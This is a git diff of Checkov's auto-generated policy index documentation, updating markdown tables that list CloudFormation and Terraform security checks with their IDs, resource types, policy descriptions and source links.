+| 161 | CKV_AWS_258 | resource | AWS::Lambda::Url                          | Ensure that Lambda function URLs AuthType is not None                                                                                                                                                    | Cloudformation | [LambdaFunctionURLAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaFunctionURLAuth.py)                                                                     |
+| 162 | CKV_AWS_260 | resource | AWS::EC2::SecurityGroup                   | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80                                                                                                                                        | Cloudformation | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py)                                           |
+| 163 | CKV_AWS_260 | resource | AWS::EC2::SecurityGroupIngress            | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80                                                                                                                                        | Cloudformation | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py)                                           |
+| 164 | CKV_AWS_291 | resource | AWS::MSK::Cluster                         | Ensure MSK nodes are private                                                                                                                                                                             | Cloudformation | [MSKClusterNodesArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/MSKClusterNodesArePrivate.py)                                                             |
+| 165 | CKV_AWS_317 | resource | AWS::Elasticsearch::Domain                | Ensure Elasticsearch Domain Audit Logging is enabled                                                                                                                                                     | Cloudformation | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainAuditLogging.py)                                                 |
+| 166 | CKV_AWS_317 | resource | AWS::OpenSearchService::Domain            | Ensure Elasticsearch Domain Audit Logging is enabled                                                                                                                                                     | Cloudformation | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainAuditLogging.py)                                                 |
+| 167 | CKV_AWS_360 | resource | AWS::DocDB::DBCluster                     | Ensure DocumentDB has an adequate backup retention period                                                                                                                                                | Cloudformation | [DocDBBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBBackupRetention.py)                                                                       |
+| 168 | CKV_AWS_361 | resource | AWS::Neptune::DBCluster                   | Ensure that Neptune DB cluster has automated backups enabled with adequate retention                                                                                                                     | Cloudformation | [NeptuneClusterBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/NeptuneClusterBackupRetention.py)                                                     |
+| 169 | CKV_AWS_363 | resource | AWS::Lambda::Function                     | Ensure Lambda Runtime is not deprecated                                                                                                                                                                  | Cloudformation | [DeprecatedLambdaRuntime.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DeprecatedLambdaRuntime.py)                                                                 |
+| 170 | CKV_AWS_363 | resource | AWS::Serverless::Function                 | Ensure Lambda Runtime is not deprecated                                                                                                                                                                  | Cloudformation | [DeprecatedLambdaRuntime.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DeprecatedLambdaRuntime.py)                                                                 |
+| 171 | CKV_AWS_364 | resource | AWS::Lambda::Permission                   | Ensure that AWS Lambda function permissions delegated to AWS services are limited by SourceArn or SourceAccount                                                                                          | Cloudformation | [LambdaServicePermission.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaServicePermission.py)                                                                 |
+| 172 | CKV_AWS_366 | resource | AWS::Cognito::IdentityPool                | Ensure AWS Cognito identity pool does not allow unauthenticated guest access                                                                                                                             | Cloudformation | [CognitoUnauthenticatedIdentities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CognitoUnauthenticatedIdentities.py)                                               |
+| 173 | CKV_AWS_367 | resource | AWS::SageMaker::DataQualityJobDefinition  | Ensure Amazon Sagemaker Data Quality Job uses KMS to encrypt model artifacts                                                                                                                             | Cloudformation | [SagemakerDataQualityJobDefinitionEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SagemakerDataQualityJobDefinitionEncryption.py)                         |
+| 174 | CKV_AWS_368 | resource | AWS::SageMaker::DataQualityJobDefinition  | Ensure Amazon Sagemaker Data Quality Job uses KMS to encrypt data on attached storage volume                                                                                                             | Cloudformation | [SagemakerDataQualityJobDefinitionVolumeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SagemakerDataQualityJobDefinitionVolumeEncryption.py)             |
+| 175 | CKV_AWS_369 | resource | AWS::SageMaker::DataQualityJobDefinition  | Ensure Amazon Sagemaker Data Quality Job encrypts all communications between instances used for monitoring jobs                                                                                          | Cloudformation | [SagemakerDataQualityJobDefinitionTrafficEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SagemakerDataQualityJobDefinitionTrafficEncryption.py)           |
+| 176 | CKV_AWS_370 | resource | AWS::SageMaker::Model                     | Ensure Amazon SageMaker model uses network isolation                                                                                                                                                     | Cloudformation | [SagemakerModelWithNetworkIsolation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SagemakerModelWithNetworkIsolation.py)                                           |
+| 177 | CKV_AWS_371 | resource | AWS::SageMaker::NotebookInstance          | Ensure Amazon SageMaker Notebook Instance only allows for IMDSv2                                                                                                                                         | Cloudformation | [SagemakerNotebookInstanceAllowsIMDSv2.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SagemakerNotebookInstanceAllowsIMDSv2.py)                                     |
+| 178 | CKV_AWS_373 | resource | AWS::Bedrock::Agent                       | Ensure Bedrock Agent is encrypted with a CMK                                                                                                                                                             | Cloudformation | [BedrockAgentEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/BedrockAgentEncrypted.py)                                                                     |
+| 179 | CKV2_AWS_33 | resource | AWS::AppSync::GraphQLApi                  | Ensure AppSync is protected by WAF                                                                                                                                                                       | Cloudformation | [AppSyncProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/graph_checks/AppSyncProtectedByWAF.yaml)                                                                 |
+| 180 | CKV2_AWS_68 | resource | AWS::IAM::Role                            | Ensure SageMaker notebook instance IAM policy is not overly permissive                                                                                                                                   | Cloudformation | [SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/graph_checks/SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml)               |
+| 181 | CKV2_AWS_68 | resource | AWS::SageMaker::NotebookInstance          | Ensure SageMaker notebook instance IAM policy is not overly permissive                                                                                                                                   | Cloudformation | [SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/graph_checks/SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml)               |
 
 
 ---
diff --git a/docs/5.Policy Index/terraform.md b/docs/5.Policy Index/terraform.md
index eb6c063d13d..831942d2aa4 100644
--- a/docs/5.Policy Index/terraform.md	
+++ b/docs/5.Policy Index/terraform.md	
@@ -6,2120 +6,2165 @@ nav_order: 1
 
 # terraform resource scans (auto generated)
 
-|      | Id              | Type     | Entity                                                  | Policy                                                                                                                                                                                                   | IaC       | Resource Link                                                                                                                                                                                                            |
-|------|-----------------|----------|---------------------------------------------------------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|-----------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
-|    0 | CKV2_ADO_1      | resource | azuredevops_branch_policy_min_reviewers                 | Ensure at least two approving reviews for PRs                                                                                                                                                            | Terraform | [ADORepositoryHasMinTwoReviewers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azuredevops/ADORepositoryHasMinTwoReviewers.yaml)                                         |
-|    1 | CKV2_ADO_1      | resource | azuredevops_git_repository                              | Ensure at least two approving reviews for PRs                                                                                                                                                            | Terraform | [ADORepositoryHasMinTwoReviewers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azuredevops/ADORepositoryHasMinTwoReviewers.yaml)                                         |
-|    2 | CKV_ALI_1       | resource | alicloud_oss_bucket                                     | Alibaba Cloud OSS bucket accessible to public                                                                                                                                                            | Terraform | [OSSBucketPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketPublic.py)                                                                                    |
-|    3 | CKV_ALI_2       | resource | alicloud_security_group_rule                            | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22                                                                                                                                        | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/SecurityGroupUnrestrictedIngress22.py)                                              |
-|    4 | CKV_ALI_3       | resource | alicloud_security_group_rule                            | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389                                                                                                                                      | Terraform | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/SecurityGroupUnrestrictedIngress3389.py)                                          |
-|    5 | CKV_ALI_4       | resource | alicloud_actiontrail_trail                              | Ensure Action Trail Logging for all regions                                                                                                                                                              | Terraform | [ActionTrailLogAllRegions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/ActionTrailLogAllRegions.py)                                                                  |
-|    6 | CKV_ALI_5       | resource | alicloud_actiontrail_trail                              | Ensure Action Trail Logging for all events                                                                                                                                                               | Terraform | [ActionTrailLogAllEvents.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/ActionTrailLogAllEvents.py)                                                                    |
-|    7 | CKV_ALI_6       | resource | alicloud_oss_bucket                                     | Ensure OSS bucket is encrypted with Customer Master Key                                                                                                                                                  | Terraform | [OSSBucketEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketEncryptedWithCMK.py)                                                                |
-|    8 | CKV_ALI_7       | resource | alicloud_disk                                           | Ensure disk is encrypted                                                                                                                                                                                 | Terraform | [DiskIsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/DiskIsEncrypted.py)                                                                                    |
-|    9 | CKV_ALI_8       | resource | alicloud_disk                                           | Ensure Disk is encrypted with Customer Master Key                                                                                                                                                        | Terraform | [DiskEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/DiskEncryptedWithCMK.py)                                                                          |
-|   10 | CKV_ALI_9       | resource | alicloud_db_instance                                    | Ensure database instance is not public                                                                                                                                                                   | Terraform | [RDSIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSIsPublic.py)                                                                                            |
-|   11 | CKV_ALI_10      | resource | alicloud_oss_bucket                                     | Ensure OSS bucket has versioning enabled                                                                                                                                                                 | Terraform | [OSSBucketVersioning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketVersioning.py)                                                                            |
-|   12 | CKV_ALI_11      | resource | alicloud_oss_bucket                                     | Ensure OSS bucket has transfer Acceleration enabled                                                                                                                                                      | Terraform | [OSSBucketTransferAcceleration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketTransferAcceleration.py)                                                        |
-|   13 | CKV_ALI_12      | resource | alicloud_oss_bucket                                     | Ensure the OSS bucket has access logging enabled                                                                                                                                                         | Terraform | [OSSBucketAccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketAccessLogs.py)                                                                            |
-|   14 | CKV_ALI_13      | resource | alicloud_ram_account_password_policy                    | Ensure RAM password policy requires minimum length of 14 or greater                                                                                                                                      | Terraform | [RAMPasswordPolicyLength.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyLength.py)                                                                    |
-|   15 | CKV_ALI_14      | resource | alicloud_ram_account_password_policy                    | Ensure RAM password policy requires at least one number                                                                                                                                                  | Terraform | [RAMPasswordPolicyNumber.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyNumber.py)                                                                    |
-|   16 | CKV_ALI_15      | resource | alicloud_ram_account_password_policy                    | Ensure RAM password policy requires at least one symbol                                                                                                                                                  | Terraform | [RAMPasswordPolicySymbol.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicySymbol.py)                                                                    |
-|   17 | CKV_ALI_16      | resource | alicloud_ram_account_password_policy                    | Ensure RAM password policy expires passwords within 90 days or less                                                                                                                                      | Terraform | [RAMPasswordPolicyExpiration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyExpiration.py)                                                            |
-|   18 | CKV_ALI_17      | resource | alicloud_ram_account_password_policy                    | Ensure RAM password policy requires at least one lowercase letter                                                                                                                                        | Terraform | [RAMPasswordPolicyLowercaseLetter.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyLowercaseLetter.py)                                                  |
-|   19 | CKV_ALI_18      | resource | alicloud_ram_account_password_policy                    | Ensure RAM password policy prevents password reuse                                                                                                                                                       | Terraform | [RAMPasswordPolicyReuse.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyReuse.py)                                                                      |
-|   20 | CKV_ALI_19      | resource | alicloud_ram_account_password_policy                    | Ensure RAM password policy requires at least one uppercase letter                                                                                                                                        | Terraform | [RAMPasswordPolicyUppcaseLetter.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyUppcaseLetter.py)                                                      |
-|   21 | CKV_ALI_20      | resource | alicloud_db_instance                                    | Ensure RDS instance uses SSL                                                                                                                                                                             | Terraform | [RDSInstanceSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceSSL.py)                                                                                      |
-|   22 | CKV_ALI_21      | resource | alicloud_api_gateway_api                                | Ensure API Gateway API Protocol HTTPS                                                                                                                                                                    | Terraform | [APIGatewayProtocolHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/APIGatewayProtocolHTTPS.py)                                                                    |
-|   23 | CKV_ALI_22      | resource | alicloud_db_instance                                    | Ensure Transparent Data Encryption is Enabled on instance                                                                                                                                                | Terraform | [RDSTransparentDataEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSTransparentDataEncryptionEnabled.py)                                            |
-|   24 | CKV_ALI_23      | resource | alicloud_ram_account_password_policy                    | Ensure Ram Account Password Policy Max Login Attempts not > 5                                                                                                                                            | Terraform | [RAMPasswordPolicyMaxLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyMaxLogin.py)                                                                |
-|   25 | CKV_ALI_24      | resource | alicloud_ram_security_preference                        | Ensure RAM enforces MFA                                                                                                                                                                                  | Terraform | [RAMSecurityEnforceMFA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMSecurityEnforceMFA.py)                                                                        |
-|   26 | CKV_ALI_25      | resource | alicloud_db_instance                                    | Ensure RDS Instance SQL Collector Retention Period should be greater than 180                                                                                                                            | Terraform | [RDSRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSRetention.py)                                                                                          |
-|   27 | CKV_ALI_26      | resource | alicloud_cs_kubernetes                                  | Ensure Kubernetes installs plugin Terway or Flannel to support standard policies                                                                                                                         | Terraform | [K8sEnableNetworkPolicies.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/K8sEnableNetworkPolicies.py)                                                                  |
-|   28 | CKV_ALI_27      | resource | alicloud_kms_key                                        | Ensure KMS Key Rotation is enabled                                                                                                                                                                       | Terraform | [KMSKeyRotationIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/KMSKeyRotationIsEnabled.py)                                                                    |
-|   29 | CKV_ALI_28      | resource | alicloud_kms_key                                        | Ensure KMS Keys are enabled                                                                                                                                                                              | Terraform | [KMSKeyIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/KMSKeyIsEnabled.py)                                                                                    |
-|   30 | CKV_ALI_29      | resource | alicloud_alb_acl_entry_attachment                       | Alibaba ALB ACL does not restrict Access                                                                                                                                                                 | Terraform | [ALBACLIsUnrestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/ALBACLIsUnrestricted.py)                                                                          |
-|   31 | CKV_ALI_30      | resource | alicloud_db_instance                                    | Ensure RDS instance auto upgrades for minor versions                                                                                                                                                     | Terraform | [RDSInstanceAutoUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceAutoUpgrade.py)                                                                      |
-|   32 | CKV_ALI_31      | resource | alicloud_cs_kubernetes_node_pool                        | Ensure K8s nodepools are set to auto repair                                                                                                                                                              | Terraform | [K8sNodePoolAutoRepair.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/K8sNodePoolAutoRepair.py)                                                                        |
-|   33 | CKV_ALI_32      | resource | alicloud_ecs_launch_template                            | Ensure launch template data disks are encrypted                                                                                                                                                          | Terraform | [LaunchTemplateDisksAreEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/LaunchTemplateDisksAreEncrypted.py)                                                    |
-|   34 | CKV_ALI_33      | resource | alicloud_slb_tls_cipher_policy                          | Alibaba Cloud Cypher Policy are secure                                                                                                                                                                   | Terraform | [TLSPoliciesAreSecure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/TLSPoliciesAreSecure.py)                                                                          |
-|   35 | CKV_ALI_35      | resource | alicloud_db_instance                                    | Ensure RDS instance has log_duration enabled                                                                                                                                                             | Terraform | [RDSInstanceLogsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceLogsEnabled.py)                                                                      |
-|   36 | CKV_ALI_36      | resource | alicloud_db_instance                                    | Ensure RDS instance has log_disconnections enabled                                                                                                                                                       | Terraform | [RDSInstanceLogDisconnections.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceLogDisconnections.py)                                                          |
-|   37 | CKV_ALI_37      | resource | alicloud_db_instance                                    | Ensure RDS instance has log_connections enabled                                                                                                                                                          | Terraform | [RDSInstanceLogConnections.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceLogConnections.py)                                                                |
-|   38 | CKV_ALI_38      | resource | alicloud_log_audit                                      | Ensure log audit is enabled for RDS                                                                                                                                                                      | Terraform | [LogAuditRDSEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/LogAuditRDSEnabled.py)                                                                              |
-|   39 | CKV_ALI_41      | resource | alicloud_mongodb_instance                               | Ensure MongoDB is deployed inside a VPC                                                                                                                                                                  | Terraform | [MongoDBInsideVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/MongoDBInsideVPC.py)                                                                                  |
-|   40 | CKV_ALI_42      | resource | alicloud_mongodb_instance                               | Ensure Mongodb instance uses SSL                                                                                                                                                                         | Terraform | [MongoDBInstanceSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/MongoDBInstanceSSL.py)                                                                              |
-|   41 | CKV_ALI_43      | resource | alicloud_mongodb_instance                               | Ensure MongoDB instance is not public                                                                                                                                                                    | Terraform | [MongoDBIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/MongoDBIsPublic.py)                                                                                    |
-|   42 | CKV_ALI_44      | resource | alicloud_mongodb_instance                               | Ensure MongoDB has Transparent Data Encryption Enabled                                                                                                                                                   | Terraform | [MongoDBTransparentDataEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/MongoDBTransparentDataEncryptionEnabled.py)                                    |
-|   43 | CKV_AWS_1       | data     | aws_iam_policy_document                                 | Ensure IAM policies that allow full "*-*" administrative privileges are not created                                                                                                                      | Terraform | [AdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/AdminPolicyDocument.py)                                                                                     |
-|   44 | CKV_AWS_2       | resource | aws_alb_listener                                        | Ensure ALB protocol is HTTPS                                                                                                                                                                             | Terraform | [ALBListenerHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBListenerHTTPS.py)                                                                                       |
-|   45 | CKV_AWS_2       | resource | aws_lb_listener                                         | Ensure ALB protocol is HTTPS                                                                                                                                                                             | Terraform | [ALBListenerHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBListenerHTTPS.py)                                                                                       |
-|   46 | CKV_AWS_3       | resource | aws_ebs_volume                                          | Ensure all data stored in the EBS is securely encrypted                                                                                                                                                  | Terraform | [EBSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EBSEncryption.py)                                                                                             |
-|   47 | CKV_AWS_5       | resource | aws_elasticsearch_domain                                | Ensure all data stored in the Elasticsearch is securely encrypted at rest                                                                                                                                | Terraform | [ElasticsearchEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchEncryption.py)                                                                         |
-|   48 | CKV_AWS_5       | resource | aws_opensearch_domain                                   | Ensure all data stored in the Elasticsearch is securely encrypted at rest                                                                                                                                | Terraform | [ElasticsearchEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchEncryption.py)                                                                         |
-|   49 | CKV_AWS_6       | resource | aws_elasticsearch_domain                                | Ensure all Elasticsearch has node-to-node encryption enabled                                                                                                                                             | Terraform | [ElasticsearchNodeToNodeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchNodeToNodeEncryption.py)                                                     |
-|   50 | CKV_AWS_6       | resource | aws_opensearch_domain                                   | Ensure all Elasticsearch has node-to-node encryption enabled                                                                                                                                             | Terraform | [ElasticsearchNodeToNodeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchNodeToNodeEncryption.py)                                                     |
-|   51 | CKV_AWS_7       | resource | aws_kms_key                                             | Ensure rotation for customer created CMKs is enabled                                                                                                                                                     | Terraform | [KMSRotation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KMSRotation.py)                                                                                                 |
-|   52 | CKV_AWS_8       | resource | aws_instance                                            | Ensure all data stored in the Launch configuration or instance Elastic Blocks Store is securely encrypted                                                                                                | Terraform | [LaunchConfigurationEBSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LaunchConfigurationEBSEncryption.py)                                                       |
-|   53 | CKV_AWS_8       | resource | aws_launch_configuration                                | Ensure all data stored in the Launch configuration or instance Elastic Blocks Store is securely encrypted                                                                                                | Terraform | [LaunchConfigurationEBSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LaunchConfigurationEBSEncryption.py)                                                       |
-|   54 | CKV_AWS_9       | resource | aws_iam_account_password_policy                         | Ensure IAM password policy expires passwords within 90 days or less                                                                                                                                      | Terraform | [PasswordPolicyExpiration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyExpiration.py)                                                                       |
-|   55 | CKV_AWS_10      | resource | aws_iam_account_password_policy                         | Ensure IAM password policy requires minimum length of 14 or greater                                                                                                                                      | Terraform | [PasswordPolicyLength.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyLength.py)                                                                               |
-|   56 | CKV_AWS_11      | resource | aws_iam_account_password_policy                         | Ensure IAM password policy requires at least one lowercase letter                                                                                                                                        | Terraform | [PasswordPolicyLowercaseLetter.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyLowercaseLetter.py)                                                             |
-|   57 | CKV_AWS_12      | resource | aws_iam_account_password_policy                         | Ensure IAM password policy requires at least one number                                                                                                                                                  | Terraform | [PasswordPolicyNumber.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyNumber.py)                                                                               |
-|   58 | CKV_AWS_13      | resource | aws_iam_account_password_policy                         | Ensure IAM password policy prevents password reuse                                                                                                                                                       | Terraform | [PasswordPolicyReuse.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyReuse.py)                                                                                 |
-|   59 | CKV_AWS_14      | resource | aws_iam_account_password_policy                         | Ensure IAM password policy requires at least one symbol                                                                                                                                                  | Terraform | [PasswordPolicySymbol.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicySymbol.py)                                                                               |
-|   60 | CKV_AWS_15      | resource | aws_iam_account_password_policy                         | Ensure IAM password policy requires at least one uppercase letter                                                                                                                                        | Terraform | [PasswordPolicyUppercaseLetter.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyUppercaseLetter.py)                                                             |
-|   61 | CKV_AWS_16      | resource | aws_db_instance                                         | Ensure all data stored in the RDS is securely encrypted at rest                                                                                                                                          | Terraform | [RDSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSEncryption.py)                                                                                             |
-|   62 | CKV_AWS_17      | resource | aws_db_instance                                         | Ensure all data stored in RDS is not publicly accessible                                                                                                                                                 | Terraform | [RDSPubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSPubliclyAccessible.py)                                                                             |
-|   63 | CKV_AWS_17      | resource | aws_rds_cluster_instance                                | Ensure all data stored in RDS is not publicly accessible                                                                                                                                                 | Terraform | [RDSPubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSPubliclyAccessible.py)                                                                             |
-|   64 | CKV_AWS_18      | resource | aws_s3_bucket                                           | Ensure the S3 bucket has access logging enabled                                                                                                                                                          | Terraform | [S3BucketLogging.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketLogging.yaml)                                                                                 |
-|   65 | CKV_AWS_19      | resource | aws_s3_bucket                                           | Ensure all data stored in the S3 bucket is securely encrypted at rest                                                                                                                                    | Terraform | [S3BucketEncryption.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketEncryption.yaml)                                                                           |
-|   66 | CKV_AWS_19      | resource | aws_s3_bucket_server_side_encryption_configuration      | Ensure all data stored in the S3 bucket is securely encrypted at rest                                                                                                                                    | Terraform | [S3BucketEncryption.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketEncryption.yaml)                                                                           |
-|   67 | CKV_AWS_20      | resource | aws_s3_bucket                                           | S3 Bucket has an ACL defined which allows public READ access.                                                                                                                                            | Terraform | [S3PublicACLRead.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3PublicACLRead.yaml)                                                                                 |
-|   68 | CKV_AWS_20      | resource | aws_s3_bucket_acl                                       | S3 Bucket has an ACL defined which allows public READ access.                                                                                                                                            | Terraform | [S3PublicACLRead.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3PublicACLRead.yaml)                                                                                 |
-|   69 | CKV_AWS_21      | resource | aws_s3_bucket                                           | Ensure all data stored in the S3 bucket have versioning enabled                                                                                                                                          | Terraform | [S3BucketVersioning.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketVersioning.yaml)                                                                           |
-|   70 | CKV_AWS_21      | resource | aws_s3_bucket_versioning                                | Ensure all data stored in the S3 bucket have versioning enabled                                                                                                                                          | Terraform | [S3BucketVersioning.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketVersioning.yaml)                                                                           |
-|   71 | CKV_AWS_22      | resource | aws_sagemaker_notebook_instance                         | Ensure SageMaker Notebook is encrypted at rest using KMS CMK                                                                                                                                             | Terraform | [SagemakerNotebookEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerNotebookEncryption.py)                                                                 |
